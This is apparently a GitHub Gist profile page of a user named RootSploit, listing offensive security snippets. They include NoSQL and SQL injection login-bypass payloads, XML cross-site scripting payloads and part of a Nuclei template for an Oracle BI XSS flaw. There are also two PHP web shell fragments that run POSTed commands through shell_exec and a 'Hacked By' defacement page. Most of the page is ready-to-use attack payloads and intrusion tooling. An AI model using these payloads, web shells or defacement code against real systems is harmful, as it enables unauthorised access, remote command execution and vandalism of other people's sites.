Skip to content

Instantly share code, notes, and snippets.


RootSploit rootsploit

View GitHub Profile
rootsploit / SSRF-Payloads.txt
Created Jan 28, 2021
Combination of SSRF Payloads
View SSRF-Payloads.txt
rootsploit / NoSQLi-login-bypass.txt
Last active Jan 25, 2021
Login Bypass methodology with NoSQLi
View NoSQLi-login-bypass.txt
Bypass with Operator:
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin$password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
rootsploit / SQLi-login-bypass.txt
Created Jan 25, 2021
SQL Injection Payloads to Bypass Login Page
View SQLi-login-bypass.txt
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
View XML-XSS.xml
<something:script xmlns:something="">alert(1)</something:script>
<a:script xmlns:a="">alert(2)</a:script>
<value><![CDATA[<script src="">confirm(document.domain)</script>]]></value>
rootsploit / CVE-2020-14818.yaml
Last active Nov 19, 2020
Nuclei Template for CVE-2020-14818: Oracle Business Intelligence - Reflected XSS
View CVE-2020-14818.yaml
id: cve-2020-14818
name: Oracle BI - XSS by @HackerOn2Wheels
author: RootSploit
severity: medium
description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence
- method: GET
View PHPwebShell.php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
<!DOCTYPE html>
<html lang="en">
<!-- By Artyum ( -->
<meta charset="utf-8">
View deface.html
<!DOCTYPE html>
<html oncontextmenu="return false;" onkeypress="return false;" onkeydown="return false;" onkeyup="return false;">
<title>//:~Hacked By RootSploit~://</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, user-scalable=0">
<meta name="Author" content="RootSploit">
<meta name="keywords" content="RootSploit, GS, Hacked, Touched, Leaked, Pawned, Deface, Website Deface, Defacement" />
<meta name="copyright" content="Silent"/>
<meta name="description" content="Silence is the most Powerful Scream"/>
View PHP-WebShell.php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
<!DOCTYPE html>
<meta charset="utf-8">
View RootSploit.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
rootsploit /
Created Aug 20, 2020
Python Script to perform Port Knocking
import socket
import itertools
import sys
import time
import argparse
class Knockit(object):
def __init__(self, args: list):